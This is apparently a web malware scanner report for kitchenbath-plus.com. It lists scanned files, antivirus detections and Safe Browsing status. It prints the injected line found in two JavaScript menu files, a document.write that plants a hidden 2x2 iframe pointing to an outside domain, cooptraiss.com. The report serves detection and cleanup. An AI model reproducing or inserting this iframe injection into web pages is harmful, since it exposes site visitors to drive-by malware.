New scan:

Malware Scanner report for kitchenbath-plus.com

Malicious/Suspicious/Total urls checked
2/0/7
2 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "kitchenbath-plus.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/2/3
2 suspicious iframes found. See details below
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=kitchenbath-plus.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://www.kitchenbath-plus.com/
200 OK
Content-Length: 9371
Content-Type: text/html
clean
http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
200 OK
Content-Length: 57254
Content-Type: text/javascript
clean
http://www.kitchenbath-plus.com/qm.js
200 OK
Content-Length: 3715
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=630271></iframe>');

qmu=true;var qm_si,qm_li,qm_lo,qm_tt,qm_th,qm_ts;var qp="parentNode";var qc="className";var qm_t=navigator.userAgent;var qm_o=qm_t.indexOf("Opera")+1;var qm_s=qm_t.indexOf("afari")+1;var qm_s2=qm_s&&window.XMLHttpRequest;var qm_n=qm_t.indexOf("Netscape")+1;var qm_v=parseFloat(navigator.vendorSub);if(window.showHe
... 2925 bytes are skipped ...
etComputedStyle)v=document.defaultView.getComputedStyle(obj,null).getPropertyValue(sname);else if(obj.currentStyle)v=obj.currentStyle[jname];if(v&&!isNaN(v=parseInt(v)))return v;else return 0;};function x2(name,b,add){var a=b[qc];if(add){if(a.indexOf(name)==-1)b[qc]+=(a?' ':'')+name;}else {b[qc]=a.replace(" "+name,"");b[qc]=b[qc].replace(name,"");}};function qm_kille(e){if(!e)e=event;e.cancelBubble=true;if(e.stopPropagation&&!(qm_s&&e.type=="click"))e.stopPropagation();}

Antivirus reports:

AntiVir
JS/iFrame.EXP.4
Avast
HTML:Iframe-BNK [Trj]
Ad-Aware
Trojan.Iframe.CEG
Ikarus
Trojan.IFrame
nProtect
Trojan.Iframe.CEG
TrendMicro-HouseCall
TROJ_GEN.F47V1229
Emsisoft
Trojan.Iframe.CEG (B)
Comodo
TrojWare.HTML.iFrame.TWTR
Kaspersky
HEUR:Trojan.Script.Generic
MicroWorld-eScan
Trojan.Iframe.CEG
F-Secure
Trojan.Iframe.CEG
Norman
Iframe.YR
GData
Trojan.Iframe.CEG
BitDefender
Trojan.Iframe.CEG

Hidden iFrame found.
size: 2x2     
src: http://cooptraiss.com/hezd.html?j=630271

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=630271>

http://www.kitchenbath-plus.com/qm_slide_effect.js
200 OK
Content-Length: 3297
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=630271></iframe>');

qmad.slide=new Object();if(qmad.bvis.indexOf("qm_slide_a(b.cdiv);")==-1)qmad.bvis+="qm_slide_a(b.cdiv);";if(qmad.bhide.indexOf("qm_slide_a(a,1);")==-1)qmad.bhide+="qm_slide_a(a,1);";qmad.br_navigator=navigator.userAgent.indexOf("Netscape")+1;qmad.br_version=parseFloat(navigator.vendorSub);qmad.br_oldnav=qmad.br_navigator
... 2437 bytes are skipped ...
veAttribute("clip");else a.obj.style.clip="auto";if(!window.showHelp)a.obj.style.clip="";if(hide)x2("qmfv",a.obj);qmad.slide["_"+id]=null;a.obj.isrun=false;}};function qm_slide_am(obj,hide){var k;for(k in qmad.slide){if(qmad.slide[k]&&obj.obj==qmad.slide[k].obj){if(qmad.slide[k].timer){clearTimeout(qmad.slide[k].timer);qmad.slide[k].timer=null;}obj.top=qmad.slide[k].top;qmad.slide[k].obj.isrun=false;qmad.slide[k]=null;}}var i=0;while(qmad.slide["_"+i])i++;qmad.slide["_"+i]=obj;return i;}

Antivirus reports:

Norman
Iframe.UW

Hidden iFrame found.
size: 2x2     
src: http://cooptraiss.com/hezd.html?j=630271

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=630271>

http://www.kitchenbath-plus.com/test404page.js
404 Not Found
Content-Length: 12839
Content-Type: text/html
clean
http://code.jquery.com/jquery-1.9.1.js
200 OK
Content-Length: 268381
Content-Type: application/x-javascript
clean
http://suspended.hostgator.com/js/simple-expand.min.js
200 OK
Content-Length: 2782
Content-Type: application/javascript
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: kitchenbath-plus.com

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: kitchenbath-plus.com
Referer: http://www.google.com/search?q=kitchenbath-plus.com

Result:
The result is similar to the first query. There are no suspicious redirects found.